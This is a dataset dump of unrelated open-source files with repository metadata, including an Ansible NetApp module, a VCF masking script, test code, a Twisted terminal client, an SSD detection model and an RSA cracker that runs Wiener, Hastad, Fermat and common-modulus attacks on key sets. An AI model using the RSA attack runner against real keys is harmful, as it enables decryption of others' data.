'RG_U34A': 'AFFYMETRIX_3PRIME_IVT_ID',
'Mouse430A_2': 'AFFYMETRIX_3PRIME_IVT_ID',
'HG_U95A': 'AFFYMETRIX_3PRIME_IVT_ID',
'HG_U133A': 'AFFYMETRIX_3PRIME_IVT_ID',
'RAE230A': 'AFFYMETRIX_3PRIME_IVT_ID',
'Hu35KsubC': 'AFFYMETRIX_3PRIME_IVT_ID',
'Hu35KsubB': 'AFFYMETRIX_3PRIME_IVT_ID',
'MG_U74Cv2': 'AFFYMETRIX_3PRIME_IVT_ID',
'HG_U133A_2': 'AFFYMETRIX_3PRIME_IVT_ID',
'Hu35KsubA': 'AFFYMETRIX_3PRIME_IVT_ID',
'Hu35KsubD': 'AFFYMETRIX_3PRIME_IVT_ID',
'MG_U74Bv2': 'AFFYMETRIX_3PRIME_IVT_ID',
'HG_U95Av2': 'AFFYMETRIX_3PRIME_IVT_ID',
'HumanHT_12': 'ILLUMINA_ID',
'HumanWG_6': 'ILLUMINA_ID',
'MouseRef_8': 'ILLUMINA_ID',
'HumanHT_12_control': 'ILLUMINA_ID',
'MouseRef_8_control': 'ILLUMINA_ID',
'Entrez_ID_human': 'ENTREZ_GENE_ID',
'Entrez_ID_mouse': 'ENTREZ_GENE_ID',
'Entrez_symbol_human': 'GENE_SYMBOL',
'Entrez_symbol_mouse': 'GENE_SYMBOL'
}
| mit | -7,182,829,996,638,434,000 | 37.554622 | 78 | 0.605929 | false | 2.924156 | false | false | false |
shsingh/ansible | lib/ansible/modules/storage/netapp/na_ontap_net_port.py | 38 | 7603 | #!/usr/bin/python
# (c) 2018-2019, NetApp, Inc
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = """
module: na_ontap_net_port
short_description: NetApp ONTAP network ports.
extends_documentation_fragment:
- netapp.na_ontap
version_added: '2.6'
author: NetApp Ansible Team (@carchi8py) <[email protected]>
description:
- Modify a ONTAP network port.
options:
state:
description:
- Whether the specified net port should exist or not.
choices: ['present']
default: present
node:
description:
- Specifies the name of node.
required: true
ports:
aliases:
- port
description:
- Specifies the name of port(s).
required: true
mtu:
description:
- Specifies the maximum transmission unit (MTU) reported by the port.
autonegotiate_admin:
description:
- Enables or disables Ethernet auto-negotiation of speed,
duplex and flow control.
duplex_admin:
description:
- Specifies the user preferred duplex setting of the port.
- Valid values auto, half, full
speed_admin:
description:
- Specifies the user preferred speed setting of the port.
flowcontrol_admin:
description:
- Specifies the user preferred flow control setting of the port.
ipspace:
description:
- Specifies the port's associated IPspace name.
- The 'Cluster' ipspace is reserved for cluster ports.
"""
EXAMPLES = """
- name: Modify Net Port
na_ontap_net_port:
state: present
username: "{{ netapp_username }}"
password: "{{ netapp_password }}"
hostname: "{{ netapp_hostname }}"
node: "{{ node_name }}"
ports: e0d,e0c
autonegotiate_admin: true
"""
RETURN = """
"""
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
import ansible.module_utils.netapp as netapp_utils
from ansible.module_utils.netapp_module import NetAppModule
HAS_NETAPP_LIB = netapp_utils.has_netapp_lib()
class NetAppOntapNetPort(object):
"""
Modify a Net port
"""
def __init__(self):
"""
Initialize the Ontap Net Port Class
"""
self.argument_spec = netapp_utils.na_ontap_host_argument_spec()
self.argument_spec.update(dict(
state=dict(required=False, choices=['present'], default='present'),
node=dict(required=True, type="str"),
ports=dict(required=True, type="list", aliases=['port']),
mtu=dict(required=False, type="str", default=None),
autonegotiate_admin=dict(required=False, type="str", default=None),
duplex_admin=dict(required=False, type="str", default=None),
speed_admin=dict(required=False, type="str", default=None),
flowcontrol_admin=dict(required=False, type="str", default=None),
ipspace=dict(required=False, type="str", default=None),
))
self.module = AnsibleModule(
argument_spec=self.argument_spec,
supports_check_mode=True
)
self.na_helper = NetAppModule()
self.parameters = self.na_helper.set_parameters(self.module.params)
self.set_playbook_zapi_key_map()
if HAS_NETAPP_LIB is False:
self.module.fail_json(msg="the python NetApp-Lib module is required")
else:
self.server = netapp_utils.setup_na_ontap_zapi(module=self.module)
return
def set_playbook_zapi_key_map(self):
self.na_helper.zapi_string_keys = {
'mtu': 'mtu',
'autonegotiate_admin': 'is-administrative-auto-negotiate',
'duplex_admin': 'administrative-duplex',
'speed_admin': 'administrative-speed',
'flowcontrol_admin': 'administrative-flowcontrol',
'ipspace': 'ipspace'
}
def get_net_port(self, port):
"""
Return details about the net port
:param: port: Name of the port
:return: Dictionary with current state of the port. None if not found.
:rtype: dict
"""
net_port_get = netapp_utils.zapi.NaElement('net-port-get-iter')
attributes = {
'query': {
'net-port-info': {
'node': self.parameters['node'],
'port': port
}
}
}
net_port_get.translate_struct(attributes)
try:
result = self.server.invoke_successfully(net_port_get, True)
if result.get_child_by_name('num-records') and int(result.get_child_content('num-records')) >= 1:
port_info = result['attributes-list']['net-port-info']
port_details = dict()
else:
return None
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error getting net ports for %s: %s' % (self.parameters['node'], to_native(error)),
exception=traceback.format_exc())
for item_key, zapi_key in self.na_helper.zapi_string_keys.items():
port_details[item_key] = port_info.get_child_content(zapi_key)
return port_details
def modify_net_port(self, port, modify):
"""
Modify a port
:param port: Name of the port
:param modify: dict with attributes to be modified
:return: None
"""
port_modify = netapp_utils.zapi.NaElement('net-port-modify')
port_attributes = {'node': self.parameters['node'],
'port': port}
for key in modify:
if key in self.na_helper.zapi_string_keys:
zapi_key = self.na_helper.zapi_string_keys.get(key)
port_attributes[zapi_key] = modify[key]
port_modify.translate_struct(port_attributes)
try:
self.server.invoke_successfully(port_modify, enable_tunneling=True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error modifying net ports for %s: %s' % (self.parameters['node'], to_native(error)),
exception=traceback.format_exc())
def autosupport_log(self):
"""
AutoSupport log for na_ontap_net_port
:return: None
"""
results = netapp_utils.get_cserver(self.server)
cserver = netapp_utils.setup_na_ontap_zapi(module=self.module, vserver=results)
netapp_utils.ems_log_event("na_ontap_net_port", cserver)
def apply(self):
"""
Run Module based on play book
"""
self.autosupport_log()
# Run the task for all ports in the list of 'ports'
for port in self.parameters['ports']:
current = self.get_net_port(port)
modify = self.na_helper.get_modified_attributes(current, self.parameters)
if self.na_helper.changed:
if self.module.check_mode:
pass
else:
if modify:
self.modify_net_port(port, modify)
self.module.exit_json(changed=self.na_helper.changed)
def main():
"""
Create the NetApp Ontap Net Port Object and modify it
"""
obj = NetAppOntapNetPort()
obj.apply()
if __name__ == '__main__':
main()
| gpl-3.0 | -154,933,924,975,446,620 | 32.641593 | 123 | 0.598843 | false | 3.923117 | false | false | false |
edenhill/muckrake | muckrake/services/background_thread.py | 1 | 2892 | # Copyright 2015 Confluent Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ducktape.services.service import Service
import threading
class BackgroundThreadService(Service):
def __init__(self, context, num_nodes):
super(BackgroundThreadService, self).__init__(context, num_nodes)
self.worker_threads = []
self.worker_errors = {}
self.lock = threading.RLock()
def _protected_worker(self, idx, node):
"""Protected worker captures exceptions and makes them available to the main thread.
This gives us the ability to propagate exceptions thrown in background threads, if desired.
"""
try:
self._worker(idx, node)
except BaseException as e:
with self.lock:
self.worker_errors[threading.currentThread().name] = e
raise e
def start_node(self, node):
idx = self.idx(node)
self.logger.info("Running %s node %d on %s", self.__class__.__name__, idx, node.account.hostname)
worker = threading.Thread(
name=self.__class__.__name__ + "-worker-" + str(idx),
target=self._protected_worker,
args=(idx, node)
)
worker.daemon = True
worker.start()
self.worker_threads.append(worker)
def wait(self):
super(BackgroundThreadService, self).wait()
for idx, worker in enumerate(self.worker_threads, 1):
self.logger.debug("Waiting for worker thread %s finish", worker.name)
worker.join()
self.worker_threads = None
# Propagate exceptions thrown in background threads
with self.lock:
if len(self.worker_errors) > 0:
raise Exception(str(self.worker_errors))
def stop(self):
if self.worker_threads is not None:
self.logger.warn(
"At least one worker thread is still running - this might occur if self.stop() is called " +
"before self.wait(). This could happen if wait() was omitted, or if an Exception triggered "
"teardown logic before wait() was reached.")
self.logger.warn("%s" % str(self.worker_threads))
super(BackgroundThreadService, self).stop()
def stop_node(self, node):
# do nothing
pass
def clean_node(self, node):
# do nothing
pass
| apache-2.0 | -2,832,471,914,038,739,000 | 33.843373 | 108 | 0.630705 | false | 4.297177 | false | false | false |
blab/nextstrain-augur | augur/mask.py | 1 | 3288 | """
Mask specified sites from a VCF file.
"""
from Bio import SeqIO
import pandas as pd
import os
import numpy as np
from .utils import run_shell_command
def get_mask_sites(vcf_file, mask_file):
'''
Creates a temporary file in correct format for vcftools to use
(two-column, tab-seperated: "chromName" "position")
'''
#Need CHROM name from VCF file:
import gzip
opn = gzip.open if vcf_file.lower().endswith('.gz') else open
with opn(vcf_file, mode='rt') as f: #'rt' necessary for gzip
for line in f:
if line[0] != "#":
header = line.strip().split('\t')
chromName = header[0]
break # once chrom is found, no need to go through rest
#Read in BED file - 2nd column always chromStart, 3rd always chromEnd
#I timed this against sets/update/sorted; this is faster
sitesToMask = []
bed = pd.read_csv(mask_file, sep='\t')
for index, row in bed.iterrows():
sitesToMask.extend(list(range(row[1], row[2]+1)))
sitesToMask = np.unique(sitesToMask)
exclude = []
for pos in sitesToMask:
exclude.append(chromName+"\t"+str(pos))
tempMaskFile = mask_file+"_maskTemp"
with open(tempMaskFile, 'w') as the_file:
the_file.write("\n".join(exclude))
return tempMaskFile
def register_arguments(parser):
parser.add_argument('--sequences', '-s', required=True, help="sequences in VCF format")
parser.add_argument('--mask', required=True, help="locations to be masked in BED file format")
parser.add_argument('--output', '-o', help="output file")
def run(args):
'''
mask specified sites from the VCF.
this occurs by removing them entirely from the VCF, essentially making
them identical to the reference at the locations
If users don't specify output, will overwrite the input file.
'''
tempMaskFile = get_mask_sites(args.sequences, args.mask)
#Read in/write out according to file ending
inCall = "--gzvcf" if args.sequences.lower().endswith('.gz') else "--vcf"
if args.output:
outCall = "| gzip -c" if args.output.lower().endswith('.gz') else ""
else:
outCall = "| gzip -c" if args.sequences.lower().endswith('.gz') else ""
#vcftools doesn't like input/output being the same file.
#If no output specified, they will be, so use copy of input we'll delete later
in_file = args.sequences
out_file = args.output
if not(args.output):
from shutil import copyfile
out_file = in_file
in_file = args.sequences+"_temp"
copyfile(args.sequences, in_file)
call = ["vcftools", "--exclude-positions", tempMaskFile, inCall, in_file, "--recode --stdout", outCall, ">", out_file]
print("Removing masked sites from VCF file using vcftools... this may take some time. Call:")
print(" ".join(call))
run_shell_command(" ".join(call), raise_errors = True)
os.remove(tempMaskFile) #remove masking file
# remove vcftools log file
try:
os.remove('out.log')
except OSError:
pass
#remove copy of input if there was no output specified
if not(args.output):
os.remove(in_file)
| agpl-3.0 | -2,466,841,330,359,204,400 | 33.354839 | 122 | 0.625304 | false | 3.753425 | false | false | false |
estaban/pyload | module/plugins/crypter/DataHuFolder.py | 1 | 2725 | # -*- coding: utf-8 -*-
############################################################################
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU Affero General Public License as #
# published by the Free Software Foundation, either version 3 of the #
# License, or (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU Affero General Public License for more details. #
# #
# You should have received a copy of the GNU Affero General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
############################################################################
import re
from module.plugins.internal.SimpleCrypter import SimpleCrypter
class DataHuFolder(SimpleCrypter):
__name__ = "DataHuFolder"
__version__ = "0.03"
__type__ = "crypter"
__pattern__ = r'http://(?:www\.)?data.hu/dir/\w+'
__description__ = """Data.hu folder decrypter plugin"""
__author_name__ = ("crash", "stickell")
__author_mail__ = "[email protected]"
LINK_PATTERN = r"<a href='(http://data\.hu/get/.+)' target='_blank'>\1</a>"
TITLE_PATTERN = ur'<title>(?P<title>.+) Let\xf6lt\xe9se</title>'
def decrypt(self, pyfile):
self.html = self.load(pyfile.url, decode=True)
if u'K\xe9rlek add meg a jelsz\xf3t' in self.html: # Password protected
password = self.getPassword()
if password is '':
self.fail("No password specified, please set right password on Add package form and retry")
self.logDebug('The folder is password protected', 'Using password: ' + password)
self.html = self.load(pyfile.url, post={'mappa_pass': password}, decode=True)
if u'Hib\xe1s jelsz\xf3' in self.html: # Wrong password
self.fail("Incorrect password, please set right password on Add package form and retry")
package_name, folder_name = self.getPackageNameAndFolder()
package_links = re.findall(self.LINK_PATTERN, self.html)
self.logDebug('Package has %d links' % len(package_links))
if package_links:
self.packages = [(package_name, package_links, folder_name)]
else:
self.fail('Could not extract any links')
| gpl-3.0 | -7,027,289,889,388,146,000 | 46.807018 | 107 | 0.557431 | false | 4.135053 | false | false | false |
mikar/60-days-of-python | oop/basics/various/various_1.py | 1 | 3703 | """
Created on 22 Mar 2014
@author: Max Demian
"""
#==============================================================================
# Multiple Inheritance
#==============================================================================
# We use super() here. If we used direct class calls instead i.e.
# BaseClass.call_me(self) etc, we'd end up with 2 calls to BaseClass
# Why? Because LeftSubclass calls RightSubclass with super() as next class
class BaseClass(object):
num_base_calls = 0
def call_me(self):
print "Calling method on Base Class"
self.num_base_calls += 1
class LeftSubclass(BaseClass):
num_left_calls = 0
def call_me(self):
super(LeftSubclass, self).call_me()
print "Calling method on Left Subclass"
self.num_left_calls += 1
class RightSubclass(BaseClass):
num_right_calls = 0
def call_me(self):
super(RightSubclass, self).call_me()
print "Calling method on Right Subclass"
self.num_right_calls += 1
class Subclass(LeftSubclass, RightSubclass):
num_sub_calls = 0
def call_me(self):
super(Subclass, self).call_me()
print "Calling method on Subclass"
self.num_sub_calls += 1
#==============================================================================
# Polymorphism
#==============================================================================
class AudioFile(object):
def __init__(self, filename):
if not filename.endswith(self.ext):
raise Exception("Invalid file format")
self.filename = filename
class MP3File(AudioFile):
ext = "mp3"
def play(self):
print "playing {} as mp3".format(self.filename)
class WavFile(AudioFile):
ext = "wav"
def play(self):
print "playing {} as wav".format(self.filename)
class OggFile(AudioFile):
ext = "ogg"
def play(self):
print "playing {} as ogg".format(self.filename)
class FlacFile(object):
def __init__(self, filename):
if not filename.endswith(".flac"):
raise Exception("Invalid file format")
self.filename = filename
def play(self):
print "playing {} as flac".format(self.filename)
class InvalidItemType(Exception):
def __init__(self, item_type):
super(InvalidItemType).__init__("Sorry, we don't sell", item_type)
class Inventory(object):
stock = {"widget": 2}
def __init__(self):
self.locked = False
def lock(self, item_type):
print item_type, "locked"
self.locked = True
def unlock(self, item_type):
print item_type, "unlocked"
self.locked = False
def purchase(self, item_type):
if self.locked:
raise Exception("Sorry, item is locked.")
if item_type not in self.stock:
raise Exception("Sorry, we don't sell", item_type)
if not self.stock[item_type]:
raise InvalidItemType(item_type)
print "Purchase complete. There are {} {}s left.".format(
self.stock[item_type] - 1, item_type)
def test_inventory():
item_type = 'widget'
inv = Inventory()
# ~ inv.lock(item_type)
inv.purchase(item_type)
inv.unlock(item_type)
inv.purchase(item_type)
if __name__ == '__main__':
s = Subclass()
s.call_me()
print(s.num_sub_calls, s.num_left_calls, s.num_right_calls,
s.num_base_calls)
ogg = OggFile("myfile.ogg")
ogg.play()
mp3 = MP3File("myfile.mp3")
mp3.play()
# This will raise the exception for wrong filetype, even though we don't
# actually check the type of the file.
# not_mp3 = MP3File("myfile.ogg")
# Custom Exceptions
test_inventory()
| mit | -3,229,084,793,834,422,000 | 26.634328 | 79 | 0.564947 | false | 3.906118 | false | false | false |
xxsergzzxx/python-for-android | python-modules/twisted/twisted/conch/insults/client.py | 133 | 4251 | """
You don't really want to use this module. Try insults.py instead.
"""
from twisted.internet import protocol
class InsultsClient(protocol.Protocol):
escapeTimeout = 0.2
def __init__(self):
self.width = self.height = None
self.xpos = self.ypos = 0
self.commandQueue = []
self.inEscape = ''
def setSize(self, width, height):
call = 0
if self.width:
call = 1
self.width = width
self.height = height
if call:
self.windowSizeChanged()
def dataReceived(self, data):
from twisted.internet import reactor
for ch in data:
if ch == '\x1b':
if self.inEscape:
self.keyReceived(ch)
self.inEscape = ''
else:
self.inEscape = ch
self.escapeCall = reactor.callLater(self.escapeTimeout,
self.endEscape)
elif ch in 'ABCD' and self.inEscape:
self.inEscape = ''
self.escapeCall.cancel()
if ch == 'A':
self.keyReceived('<Up>')
elif ch == 'B':
self.keyReceived('<Down>')
elif ch == 'C':
self.keyReceived('<Right>')
elif ch == 'D':
self.keyReceived('<Left>')
elif self.inEscape:
self.inEscape += ch
else:
self.keyReceived(ch)
def endEscape(self):
ch = self.inEscape
self.inEscape = ''
self.keyReceived(ch)
def initScreen(self):
self.transport.write('\x1b=\x1b[?1h')
def gotoXY(self, x, y):
"""Go to a position on the screen.
"""
self.xpos = x
self.ypos = y
self.commandQueue.append(('gotoxy', x, y))
def writeCh(self, ch):
"""Write a character to the screen. If we're at the end of the row,
ignore the write.
"""
if self.xpos < self.width - 1:
self.commandQueue.append(('write', ch))
self.xpos += 1
def writeStr(self, s):
"""Write a string to the screen. This does not wrap a the edge of the
screen, and stops at \\r and \\n.
"""
s = s[:self.width-self.xpos]
if '\n' in s:
s=s[:s.find('\n')]
if '\r' in s:
s=s[:s.find('\r')]
self.commandQueue.append(('write', s))
self.xpos += len(s)
def eraseToLine(self):
"""Erase from the current position to the end of the line.
"""
self.commandQueue.append(('eraseeol',))
def eraseToScreen(self):
"""Erase from the current position to the end of the screen.
"""
self.commandQueue.append(('eraseeos',))
def clearScreen(self):
"""Clear the screen, and return the cursor to 0, 0.
"""
self.commandQueue = [('cls',)]
self.xpos = self.ypos = 0
def setAttributes(self, *attrs):
"""Set the attributes for drawing on the screen.
"""
self.commandQueue.append(('attributes', attrs))
def refresh(self):
"""Redraw the screen.
"""
redraw = ''
for command in self.commandQueue:
if command[0] == 'gotoxy':
redraw += '\x1b[%i;%iH' % (command[2]+1, command[1]+1)
elif command[0] == 'write':
redraw += command[1]
elif command[0] == 'eraseeol':
redraw += '\x1b[0K'
elif command[0] == 'eraseeos':
redraw += '\x1b[OJ'
elif command[0] == 'cls':
redraw += '\x1b[H\x1b[J'
elif command[0] == 'attributes':
redraw += '\x1b[%sm' % ';'.join(map(str, command[1]))
else:
print command
self.commandQueue = []
self.transport.write(redraw)
def windowSizeChanged(self):
"""Called when the size of the window changes.
Might want to redraw the screen here, or something.
"""
def keyReceived(self, key):
"""Called when the user hits a key.
"""
| apache-2.0 | 1,074,567,732,489,870,200 | 29.804348 | 78 | 0.489532 | false | 4.037037 | false | false | false |
willrp/willbuyer | backend/tests/unit/controller/api/cart/test_remove_controller.py | 1 | 3858 | import pytest
import responses
import re
from flask import json
from json import JSONDecodeError
from werkzeug.exceptions import HTTPException
from requests import ConnectionError
from backend.service import CartService
from backend.util.response.cart import CartSchema
from backend.util.response.error import ErrorSchema
from backend.errors.request_error import ValidationError
@pytest.fixture(scope="function", autouse=True)
def controller_mocker(mocker):
mocker.patch.object(CartService, "__init__", return_value=None)
@pytest.fixture(scope="module")
def response_json():
return {
"total": {
"outlet": 10.55,
"retail": 20.9,
"symbol": "£"
},
"products": [
{
"id": "id",
"name": "string",
"image": "string",
"price": {
"outlet": 10.55,
"retail": 20.9,
"symbol": "£"
},
"discount": 80.5,
"amount": 1
}
]
}
def test_remove_controller(mocker, flask_app, willstores_ws, response_json):
mocker.patch.object(CartService, "remove_item", return_value=True)
mocker.patch.object(CartService, "to_list", return_value=[{"item_id": "id", "amount": 1}])
with responses.RequestsMock() as rsps:
rsps.add(responses.POST, re.compile(willstores_ws),
status=200,
json=response_json
)
with flask_app.test_client() as client:
response = client.post(
"api/cart/remove/test"
)
data = json.loads(response.data)
CartSchema().load(data)
assert response.status_code == 200
def test_remove_controller_unregistered(mocker, flask_app, willstores_ws):
mocker.patch.object(CartService, "remove_item", side_effect=ValidationError("test"))
with flask_app.test_client() as client:
response = client.post(
"api/cart/remove/test"
)
data = json.loads(response.data)
ErrorSchema().load(data)
assert response.status_code == 400
@pytest.mark.parametrize(
"method,http_method,test_url,error,status_code",
[
("remove_item", "POST", "api/cart/remove/test", HTTPException(), 400),
("remove_item", "POST", "api/cart/remove/test", ConnectionError(), 502),
("remove_item", "POST", "api/cart/remove/test", Exception(), 500)
]
)
def test_remove_controller_error(mocker, willstores_ws, get_request_function, method, http_method, test_url, error, status_code):
mocker.patch.object(CartService, method, side_effect=error)
make_request = get_request_function(http_method)
response = make_request(
test_url
)
data = json.loads(response.data)
ErrorSchema().load(data)
assert response.status_code == status_code
@pytest.mark.parametrize(
"test_url, status_code",
[
("api/cart/remove/test", 400),
("api/cart/remove/test", 401),
("api/cart/remove/test", 500),
("api/cart/remove/test", 504),
]
)
def test_update_controller_http_error(mocker, flask_app, willstores_ws, json_error_recv, test_url, status_code):
mocker.patch.object(CartService, "remove_item", return_value=True)
mocker.patch.object(CartService, "to_list", return_value=[{"item_id": "id", "amount": 1}])
with responses.RequestsMock() as rsps:
rsps.add(responses.POST, re.compile(willstores_ws),
status=status_code,
json=json_error_recv
)
with flask_app.test_client() as client:
response = client.post(
test_url
)
data = json.loads(response.data)
ErrorSchema().load(data)
assert response.status_code == status_code
| mit | -556,904,506,098,188,350 | 29.125 | 129 | 0.600104 | false | 3.769306 | true | false | false |
Xinglab/SEASTAR | MATS/check_input.py | 1 | 1146 | #this script scans the input file for errors
import re,os,sys
res='replicate';
ifile=open(sys.argv[1]);
ifile.readline();
ilines=ifile.readlines();
len_group_1=-1;len_group_2=-1;
for i in ilines:
element=re.findall('[^\t]+',i);
inc1=re.findall('[^,]+',element[1]);skp1=re.findall('[^,]+',element[2]);
inc2=re.findall('[^,]+',element[3]);skp2=re.findall('[^,]+',element[4]);
if (len(inc1)+len(inc2))==2:
res='pooled';
#check length of inclusion / skipping
if len(inc1)!=len(skp1):
res='Error: different number of inclusion and skipping counts.\n'+str(i);break;
if len(inc2)!=len(skp2):
res='Error: different number of inclusion and skipping counts.\n'+str(i);break;
#check the length of inclusion / skipping that is the same for all the exons
if len_group_1==-1:
len_group_1=len(inc1);
if len_group_2==-1:
len_group_2=len(inc2);
if len_group_1!=len(inc1):
res='Error: number of inclusion and skipping counts are not the same for different exons.\n'+str(i);break;
if len_group_2!=len(inc2):
res='Error: number of inclusion and skipping counts are not the same for different exons.\n'+str(i);break;
print(res);
| gpl-3.0 | 3,884,763,541,801,427,000 | 28.384615 | 108 | 0.679756 | false | 2.71564 | false | false | false |
vik001ind/RSAExploits | RSAExploits/rsa_cracker.py | 1 | 1531 | """ RSA_Cracker: Cracks RSA key set by using various attacks """
from RSAExploits.exploits.common_modulus import Common_Modulus
from RSAExploits.exploits.wiener import Wiener
from RSAExploits.exploits.boneh_durfee import Boneh_Durfee
from RSAExploits.exploits.hastad import Hastad
from RSAExploits.exploits.fermat import Fermat
from RSAExploits.exploits.common_factor import Common_Factor
from RSAExploits.exploits.franklin_reiter import Franklin_Reiter
__Exploit_Classes__ = []
def init():
""" Populate the Exploit_Classes list with exploits to run """
global __Exploit_Classes__
__Exploit_Classes__ = []
__Exploit_Classes__.append(Franklin_Reiter())
__Exploit_Classes__.append(Common_Modulus())
__Exploit_Classes__.append(Common_Factor())
__Exploit_Classes__.append(Wiener())
__Exploit_Classes__.append(Boneh_Durfee())
__Exploit_Classes__.append(Hastad())
__Exploit_Classes__.append(Fermat())
def attack(rsadata_list, info_dict = None, break_on_success = True):
""" Run all of the exploits in the list on the provided rsadata objects
Args:
rsadata_list: A list of RSA_Data objects to exploit
info_dict: Dictionary providing extra info to certain exploits
break_on_success: Stop after first successful exploit if true
"""
success = False
for exploit in __Exploit_Classes__:
if exploit.run(rsadata_list, info_dict):
success = True
if success and break_on_success:
return success
| mit | -1,023,226,246,627,989,000 | 36.341463 | 75 | 0.69693 | false | 3.440449 | false | false | false |
mlperf/inference_results_v0.5 | closed/Google/code/ssd-large/tpu-ssd-large/home/kbuilder/mlperf-inference/google3/third_party/mlperf/inference/ssd/offline/ssd_model.py | 1 | 13883 | # Copyright 2018 Google. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Model defination for the SSD Model.
Defines model_fn of SSD for TF Estimator. The model_fn includes SSD
model architecture, loss function, learning rate schedule, and evaluation
procedure.
T.-Y. Lin, P. Goyal, R. Girshick, K. He, and P. Dollar
Focal Loss for Dense Object Detection. arXiv:1708.02002
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools as it
import math
import numpy as np
import tensorflow as tf
import ssd_architecture
import ssd_constants
from tensorflow.contrib.tpu.python.tpu import bfloat16
BBOX_XFORM_CLIP = np.log(1000. / 16.)
class DefaultBoxes(object):
"""Default bounding boxes for 1200x1200 5 layer SSD.
Default bounding boxes generation follows the order of (W, H, anchor_sizes).
Therefore, the tensor converted from DefaultBoxes has a shape of
[anchor_sizes, H, W, 4]. The last dimension is the box coordinates; 'ltrb'
is [ymin, xmin, ymax, xmax] while 'xywh' is [cy, cx, h, w].
"""
def __init__(self):
steps = [
int(ssd_constants.IMAGE_SIZE / fs) for fs in ssd_constants.FEATURE_SIZES
]
fk = ssd_constants.IMAGE_SIZE / np.array(steps)
self.default_boxes = []
# Scale by image size.
scales = [
int(s * ssd_constants.IMAGE_SIZE / 300) for s in ssd_constants.SCALES
]
# size of feature and number of feature
for idx, feature_size in enumerate(ssd_constants.FEATURE_SIZES):
sk1 = scales[idx] / ssd_constants.IMAGE_SIZE
sk2 = scales[idx + 1] / ssd_constants.IMAGE_SIZE
sk3 = math.sqrt(sk1 * sk2)
all_sizes = [(sk1, sk1), (sk3, sk3)]
for alpha in ssd_constants.ASPECT_RATIOS[idx]:
w, h = sk1 * math.sqrt(alpha), sk1 / math.sqrt(alpha)
all_sizes.append((w, h))
all_sizes.append((h, w))
assert len(all_sizes) == ssd_constants.NUM_DEFAULTS[idx]
for w, h in all_sizes:
for i, j in it.product(range(feature_size), repeat=2):
cx, cy = (j + 0.5) / fk[idx], (i + 0.5) / fk[idx]
box = tuple(np.clip(k, 0, 1) for k in (cy, cx, h, w))
self.default_boxes.append(box)
assert len(self.default_boxes) == ssd_constants.NUM_SSD_BOXES
def to_ltrb(cy, cx, h, w):
return cy - h / 2, cx - w / 2, cy + h / 2, cx + w / 2
# For IoU calculation
self.default_boxes_ltrb = tuple(to_ltrb(*i) for i in self.default_boxes)
def __call__(self, order='ltrb'):
if order == 'ltrb':
return self.default_boxes_ltrb
if order == 'xywh':
return self.default_boxes
def decode_boxes(encoded_boxes, anchors, weights=None):
"""Decode boxes.
Args:
encoded_boxes: a tensor whose last dimension is 4 representing the
coordinates of encoded boxes in ymin, xmin, ymax, xmax order.
anchors: a tensor whose shape is the same as `boxes` representing the
coordinates of anchors in ymin, xmin, ymax, xmax order.
weights: None or a list of four float numbers used to scale coordinates.
Returns:
encoded_boxes: a tensor whose shape is the same as `boxes` representing the
decoded box targets.
"""
with tf.name_scope('decode_box'):
encoded_boxes = tf.cast(encoded_boxes, dtype=anchors.dtype)
dy = encoded_boxes[..., 0:1]
dx = encoded_boxes[..., 1:2]
dh = encoded_boxes[..., 2:3]
dw = encoded_boxes[..., 3:4]
if weights:
dy /= weights[0]
dx /= weights[1]
dh /= weights[2]
dw /= weights[3]
dh = tf.minimum(dh, BBOX_XFORM_CLIP)
dw = tf.minimum(dw, BBOX_XFORM_CLIP)
anchor_ymin = anchors[..., 0:1]
anchor_xmin = anchors[..., 1:2]
anchor_ymax = anchors[..., 2:3]
anchor_xmax = anchors[..., 3:4]
anchor_h = anchor_ymax - anchor_ymin
anchor_w = anchor_xmax - anchor_xmin
anchor_yc = anchor_ymin + 0.5 * anchor_h
anchor_xc = anchor_xmin + 0.5 * anchor_w
decoded_boxes_yc = dy * anchor_h + anchor_yc
decoded_boxes_xc = dx * anchor_w + anchor_xc
decoded_boxes_h = tf.exp(dh) * anchor_h
decoded_boxes_w = tf.exp(dw) * anchor_w
decoded_boxes_ymin = decoded_boxes_yc - 0.5 * decoded_boxes_h
decoded_boxes_xmin = decoded_boxes_xc - 0.5 * decoded_boxes_w
decoded_boxes_ymax = decoded_boxes_yc + 0.5 * decoded_boxes_h
decoded_boxes_xmax = decoded_boxes_xc + 0.5 * decoded_boxes_w
decoded_boxes = tf.concat([
decoded_boxes_ymin, decoded_boxes_xmin, decoded_boxes_ymax,
decoded_boxes_xmax
],
axis=-1)
return decoded_boxes
def select_top_k_scores(scores_in, pre_nms_num_detections=5000):
"""Select top_k scores and indices for each class.
Args:
scores_in: a Tensor with shape [batch_size, num_classes, N], which stacks
class logit outputs on all feature levels. The N is the number of total
anchors on all levels. The num_classes is the number of classes predicted
by the model.
pre_nms_num_detections: Number of candidates before NMS.
Returns:
scores and indices: Tensors with shape [batch_size, pre_nms_num_detections,
num_classes].
"""
_, num_class, num_anchors = scores_in.get_shape().as_list()
scores = tf.reshape(scores_in, [-1, num_anchors])
